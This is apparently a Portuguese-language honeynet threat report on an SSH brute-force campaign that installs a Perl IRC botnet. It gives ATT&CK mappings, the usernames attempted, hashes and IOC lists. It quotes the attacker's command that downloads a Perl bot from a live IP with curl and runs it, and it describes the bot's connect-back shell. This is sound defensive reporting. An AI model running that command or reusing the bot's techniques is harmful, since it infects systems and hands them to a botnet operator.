02.png

Em nossa honeyNET do projeto temos um tipo de sensor que tem como objetivo principal capturar credenciais através do serviço SSH, e através do mesmo foi possível observar nos dois primeiros meses do ano, uma campanha de BotNet IRC, utilizando técnicas de BruteForcing SSH + Download de componente Perl para comunicação com C2 por meio de  comandos IRC.

 

Este relatório irá demonstrar um pouco mais sobre esta campanha.

Botnet IRC - MITRE.PNG

Origem do Ataque:

  • IP: 188.254.0.184

  • Country: Russian

  • Owner: BROADBAND_INTERNET_ACCESS

 

Presente na Threat Feed (Blocklist.DE)

 

Maiores informações no seguinte link:


https://pulsedive.com/indicator/?iid=13602959&utm_medium=addon&utm_source=popup

Attacker.PNG

ATT&CK T1133 - Serviço SSH

ATT&CK T1078 - Principais Credenciais Utilizadas

​Usuários:

  • oracle

  • git

  • postgres

  • user0

  • user

  • hadoop

  • cssserver

  • jenkins

  • test

  • nagios

  • db2inst1

  • rabbitmq

  • user1

  • web1

  • user2

Senhas:​

ATT&CK T1059 - Command Injection

>_ uname -a & lscpu ; curl -O http://51.91.78.140/s.txt ; perl s.txt ; rm -rf s.txt

ID.PNG

Imagem presente como Raiz no Site http://51.91.78.140/

IP: 51.91.78.140

Hostname: vps-fa16be32.vps.ovh.net

URL: http://51.91.78.140/s.txt

Files:

  • SSDeep: 384:v0FINvSo5o/D3Ioq47z2YEEFXBRBfZ4zLZP1hncu/tpbOfvuy/97M8j:YCEIoq47z2YEmXBRBshvbSZP

  • MD5: 647dd92a13b420970c26daf505334af5

  • SHA1: b52bfc7b403f03bbe493e1eb4bee6e49127c7da1

  • SHA256: b060b9a22dc3b66b4db9644dcf04cec30016dddc03c1f01447775a0b179ba136

Funções:

funcoes.PNG

ATT&CK T1036 - Mascaramento do Processo em Execução

Att&CK T1036.PNG

Função de Aleatoriedade do Nome do BOT Registrado no C2 IRC:

c2.PNG

ATT&CK T1071 - Endereço C2 IRC

Att&CK T1071.PNG
whois.PNG

Informações sobre o C2 IRC  - Provedor OVH

credentials.PNG

Informações sobre a campanha em questão, contendo o Login do administrador e o Host Signature do IRC Server. Os bots irão aceitar comandos apenas deste administrador e Host. Qualquer outro usuário ou servidor de IRC sem este signature são ignorados pelos Bots

Esta mesma campanha já havia sido detectada no início do mês de Janeiro, porém percebemos a tentativa de mudança da origem de Brute-Force SSH, tendo IPs de origens diferentes naquele momento.

  • 191.239.243.104

  • 128.199.89.60

  • 191.232.48.177

  • 223.119.31.229

  • 188.254.0.184

Percebe-se que a campanha teve início no fim de 2020, conforme trecho extraído do código onde consta domínio registrado no período.

Domain: dauporno.online

dauporno.online.PNG

Espanhol:

espanhol.PNG

Português:

portugues.PNG
portugues2.PNG

Português no código e Romeno na Msg:

romeno.PNG

Exemplo de código com as funções que o Bot tem disponíveis:

Codigo.PNG

Importante função de ConnectBack, que pode ser utilizada para abrir uma sessão remota paralela em Shell.

ConnectBack.PNG

Outra função interessante é de Command Shell. Basta executar comandos diretamente no prompt do Chat IRC que o Bot irá executá-los no sistemas operacional.

CmdShell.PNG

Segue exemplo de criação de uma BotNet IRC com o Payload Perl.

cmd channel.PNG

Exemplo de chat privado com Bot individual.

Payload Perl.PNG

Indicadores de Comprometimento (IOCs):

IP SRC - Brute Forcer:

  • 191.239.243.104

  • 188.254.0.184

  • 128.199.89.60

  • 177.126.130.112

  • 191.232.48.177

  • 223.119.31.229

  • 42.192.195.64

 

URLs - Payload Download:

IP-DST - Payload Download:

Domain - Payload Download:

  • dauporno(.)do(.)am

Perl File SSDeep:

  • 384:v0FINvSo5o/D3Ioq47z2YEEFXBRBfZ4zLZP1hncu/tpbOfvuy/97M8j:YCEIoq47z2YEmXBRBshvbSZP

  • 384:v0FINvSo5o/DMIoq47z2YEEFXBRBfZ4zLZP1hncu/tpbOfvuy/97M8T:YCtIoq47z2YEmXBRBshvbSZX

 

IP-DST - C2 IRC Server:

  • 51.195.26.217 (tcp/6667)

  • 230.22.1.217 (tcp/6667)

Apoiadores

Pulsedive%2520with%2520Name_edited_edite